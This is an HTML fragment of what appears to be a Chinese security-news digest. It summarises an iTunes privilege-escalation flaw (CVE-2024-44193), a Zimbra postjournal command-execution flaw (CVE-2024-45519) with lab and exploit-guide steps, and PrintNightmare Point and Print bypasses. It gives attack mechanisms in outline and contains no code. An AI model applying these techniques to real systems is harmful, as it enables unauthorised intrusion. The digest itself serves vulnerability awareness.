		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页内容主要介绍了 CVE-2024–44193 漏洞，这是一个 iTunes 版本 12.13.2.3 的本地权限提升 0-day 漏洞，该漏洞允许低权限用户通过操纵 AppleMobileDeviceService.exe 服务，实现任意代码执行，并获取 SYSTEM 权限。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5907407407407408" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c2770fc1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu8bgFOH2YG2kdhJ7l2gKHlVJoBCXhrdruYFjFIqjcRicyDg4kGZicibyaQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.34408602150537637" data-w="930" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=70f8b138&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu7zEZXiatZMaWKpxu0wsYCyeb9BtWQgqlYmvtDL3dBicTh0pNW4rcTRHw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.6880222841225627" data-w="718" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=31cd91c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu4RLsF2c8xDd4hQOwY2oHEFdWYnjQyxnDTYicVWMtWhlgTiabQhq8eyMg%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">iTunes 0day 漏洞可导致 Windows 本地提权</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">iTunes 0day 漏洞可导致 Windows 本地提权</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuMEqFZGLm0icHibb7WsxgnnKw3kpjDFLYnuxaHM1piaArV5ibiaH9iceib9Bkg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuMEqFZGLm0icHibb7WsxgnnKw3kpjDFLYnuxaHM1piaArV5ibiaH9iceib9Bkg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858284848148551"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024–44193 漏洞利用了 AppleMobileDeviceService.exe 服务的安全漏洞，该服务在启动时会删除 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">C:\\ProgramData\\Apple\\Lockdown\\</code> 目录下的非法文件和文件夹，但没有正确管理用户权限，导致普通用户可以写入该目录，进而实现权限提升。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用该漏洞的关键在于结合 NTFS 硬链接和服务重启，攻击者可以实现任意文件或文件夹的删除，进而提升到 SYSTEM 权限，执行任意代码。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">文章中提到的 FilesystemEoPs 和 FolderOrFileDeleteToSystem 等工具是实现利用链的重要组成部分，它们分别负责文件和文件夹的操作，以及恶意代码的执行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过这次漏洞的分析，揭示了 iTunes 安装在 Windows 系统上的安全问题，并提供了一个详细的权限提升技术，这对于恶意软件作者和漏洞防御者都具有重要意义。</section></li></ul>
	<br/>
	<p>🏷️: CVE-2024-44193, iTunes, 本地权限提升, 漏洞, Apple</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0e
			 Zimbra Postjournal漏洞利用指南</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">CVE-2024-45519 是 Zimbra Collaboration (ZCS) 中的一个漏洞，允许未认证用户通过 postjournal 服务执行命令，该网页提供了搭建实验室环境并利用此漏洞的步骤指南。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.6509259259259259" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9fd103ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuryNJUBW3P8BJlmmG1gtFUEvM3ycejibfHOkk1v8VPqoEKLZZPJuxgXw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-45519 漏洞利用与实验环境搭建</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Zimbra 远程命令执行漏洞 CVE-2024-45519</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu4Gs3xJOQZiaWoloCAVTTlqGyGzQkdyk7BTQHBzstpDzUzctOQPXHAvw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu4Gs3xJOQZiaWoloCAVTTlqGyGzQkdyk7BTQHBzstpDzUzctOQPXHAvw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848582828122188"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-45519 漏洞严重影响 Zimbra Collaboration Suite 的安全性，允许未认证攻击者执行任意命令。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">搭建实验室环境需要在 Ubuntu 20.04.6 LTS 上操作，并且要求严格按照指南进行，包括安装、配置和服务管理。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用此漏洞的过程需要准备相应的利用脚本，并且要确保目标系统的 IP 地址和端口号正确。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">文章提供的信息旨在用于教育和合法的安全测试，严禁在未经授权的系统上使用。</section></li></ul>
	<br/>
	<p>🏷️: CVE-2024-45519, Zimbra, 漏洞利用, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0f
			 PrintNightmare漏洞仍未解决</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页讨论了PrintNightmare漏洞的持续影响，并探讨了Point and Print (PnP)配置的保护措施以及这些措施可能存在的绕过方法。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.46534653465346537" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="707" src="https://wechat2rss.xlab.app/img-proxy/?k=f8b25a2b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu61p4ZysG444ynQqInsYgpAvC9KkibNaODaY9yPNej3ibcV0Xn0KTjLOQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5260504201680672" data-w="595" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=6191ef61&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuPoAIX4pbapA5hnEhY0T8atJlhXWtKGVH3j1STHKDrZiaVjVMDTib38icg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.6122715404699739" data-w="766" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=c681a964&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu1ICm4HsEZdAndyXq2E75PYaNJweJZTL1MzBArjvgeicaQDa5mPx9LeQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: 